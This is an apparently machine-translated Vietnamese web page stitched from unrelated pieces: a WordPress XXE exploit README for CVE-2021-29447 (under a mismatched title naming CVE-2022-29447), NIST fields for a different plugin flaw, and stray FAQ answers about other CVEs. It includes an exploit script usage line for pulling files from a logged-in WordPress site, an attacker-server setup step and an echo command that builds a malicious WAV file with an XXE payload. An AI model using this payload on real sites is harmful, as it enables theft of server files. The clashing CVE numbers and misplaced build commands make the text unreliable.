WordPress CVE-2022-29447

Tất cả thông tin có trong cơ sở dữ liệu này được cung cấp bởi Wordfence Intelligence.
Bạn muốn tích hợp dữ liệu này vào nền tảng hoặc mạng của mình?
Liên hệ với chúng tôi ngay bây giờ để thảo luận về quyền truy cập API vào Nguồn cấp dữ liệu thông minh Wordfence của chúng tôi.

hỏi ngay

Khai thác WordPress Media Library XML đã xác thực External Entity Injection (XXE) để trích xuất các tệp

Đã vá trong WordPress 5. 7. 1

Yêu cầu thông tin đăng nhập WordPress hợp lệ để tương tác với Thư viện phương tiện

Cách sử dụng

python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD

Tập lệnh sẽ yêu cầu đường dẫn tệp và trả về tệp được yêu cầu

Tín dụng

Lấy cảm hứng từ tập lệnh ExploitDB của David Utón (M3n0sD0n4ld)

từ chối trách nhiệm

Việc sử dụng điều này để tấn công các mục tiêu mà không có sự đồng ý trước của cả hai bên là bất hợp pháp. Người dùng cuối có trách nhiệm tuân thủ tất cả các luật hiện hành của địa phương, tiểu bang và liên bang. Các nhà phát triển không chịu trách nhiệm pháp lý và không chịu trách nhiệm cho bất kỳ sự lạm dụng hoặc thiệt hại nào do chương trình này gây ra. Chỉ sử dụng cho mục đích giáo dục

wordpress 5. 6-5. 7 - Đã xác thực (Tác giả+) XXE (CVE-2021-29447)

sử dụng

Bước 1. Chạy WordPress

$ make up-wp

Bước 2. Chạy máy chủ web Attacker

$ make up-mal

Bước 3. Tạo tệp WAV độc hại

Không có npm wavefile (Khuyến nghị)

$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;] >\x00'> malicious.wav

Với tệp sóng npm

$ make make-wav

Bước 4. Đăng nhập vào WordPress & Tải tệp WAV lên Phương tiện Mới

WordPress CVE-2022-29447

Bước5. giải mã

WordPress CVE-2022-29447

WordPress CVE-2022-29447

WordPress CVE-2022-29447

Người giới thiệu

  • wordpress 5. 6-5. 7 - XXE được xác thực trong Thư viện phương tiện ảnh hưởng đến lỗ hổng bảo mật PHP 8

Wordpress là một CMS mã nguồn mở. Người dùng có khả năng tải tệp lên (như Tác giả) có thể khai thác sự cố phân tích cú pháp XML trong Thư viện phương tiện dẫn đến các cuộc tấn công XXE. Điều này yêu cầu cài đặt WordPress đang sử dụng PHP 8. Có thể truy cập vào các tệp nội bộ trong một cuộc tấn công XXE thành công. Điều này đã được vá trong phiên bản WordPress 5. 7. 1, cùng với các phiên bản cũ hơn bị ảnh hưởng thông qua một bản phát hành nhỏ. Chúng tôi thực sự khuyên bạn nên bật cập nhật tự động

Lỗ hổng được xác thực (quản trị viên hoặc vai trò người dùng cao hơn) Bao gồm tệp cục bộ (LFI) trong plugin Hover Effects của Wow-Company <= 2. 1 tại WordPress

liệt kê điểm yếu

CWE-IDCWE NameSourceCWE-552Tệp hoặc thư mục mà các bên bên ngoài có thể truy cập NIST  

thay đổi lịch sử

Đã tìm thấy 1 bản ghi thay đổi

Phân tích ban đầu của NIST 6/02/2022 10. 57. 24 giờ sáng

Loại hành động Giá trị cũ Giá trị mới được thêm vào Cấu hình CPE_______5AddedCVSS V2
NIST (AV:N/AC:L/Au:S/C:P/I:N/A:N)
AddedCVSS V3. 1
NIST AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Đã thêmCWE
NIST CWE-552
Loại tham chiếu đã thay đổi
https://patchstack.com/database/vulnerability/hover-effects/wordpress-hover-effects-plugin-2-1-authenticated-local-file-inclusion-lfi-vulnerability No Types Assigned
$ make up-wp
0Loại tham chiếu đã thay đổi
$ make up-wp
1
$ make up-wp
2

Không có bất kỳ mô-đun metasploit nào liên quan đến mục CVE này (Vui lòng truy cập www. siêu khai thác. com để biết thêm thông tin)

Việc sử dụng thông tin này cấu thành sự chấp nhận sử dụng trong điều kiện AS IS. KHÔNG có bảo đảm, ngụ ý hay nói cách khác, liên quan đến thông tin này hoặc việc sử dụng nó. Bất kỳ việc sử dụng thông tin này đều có rủi ro của người dùng. Người dùng có trách nhiệm đánh giá tính chính xác, đầy đủ hoặc hữu ích của bất kỳ thông tin, ý kiến, lời khuyên hoặc nội dung nào khác. MỖI NGƯỜI DÙNG SẼ CHỊU CHỊU TRÁCH NHIỆM HOÀN TOÀN CHO BẤT KỲ hậu quả nào do việc họ trực tiếp hoặc gián tiếp sử dụng trang web này. TẤT CẢ CÁC BẢO ĐẢM DƯỚI BẤT KỲ HÌNH THỨC NÀO ĐỀU ĐƯỢC MIỄN TRỪ TRÁCH NHIỆM RÕ RÀNG. Trang web này sẽ KHÔNG CHỊU TRÁCH NHIỆM PHÁP LÝ CHO BẤT KỲ tổn thất TRỰC TIẾP, GIÁN TIẾP hay bất kỳ hình thức tổn thất nào khác

Lỗ hổng CVE 2022 21907 http là gì?

Thực thi mã từ xa ngăn xếp giao thức HTTP (CVE-2022-21907) là một loại lỗ hổng RCE nghiêm trọng ảnh hưởng đến các ứng dụng dựa trên thành phần Dịch vụ thông tin Internet (IIS) của Microsoft. Attacks exploiting this vulnerability target the kernel module within the HTTP.

Tôi có thể tìm lỗ hổng CVE ở đâu?

www. cvdetails. com cung cấp giao diện web dễ sử dụng cho dữ liệu lỗ hổng CVE. Bạn có thể duyệt tìm nhà cung cấp, sản phẩm và phiên bản cũng như xem các mục cve, lỗ hổng liên quan đến chúng. Bạn có thể xem số liệu thống kê về nhà cung cấp, sản phẩm và phiên bản của sản phẩm.

CVE cho PrintNightmare là gì?

“PrintNightmare” ( CVE-2021–34527 ) là một lỗ hổng leo thang đặc quyền cục bộ (LPE) và thực thi mã từ xa (RCE) .

CVE 2022 0778 là gì?

Tóm tắt CVE-2022-0778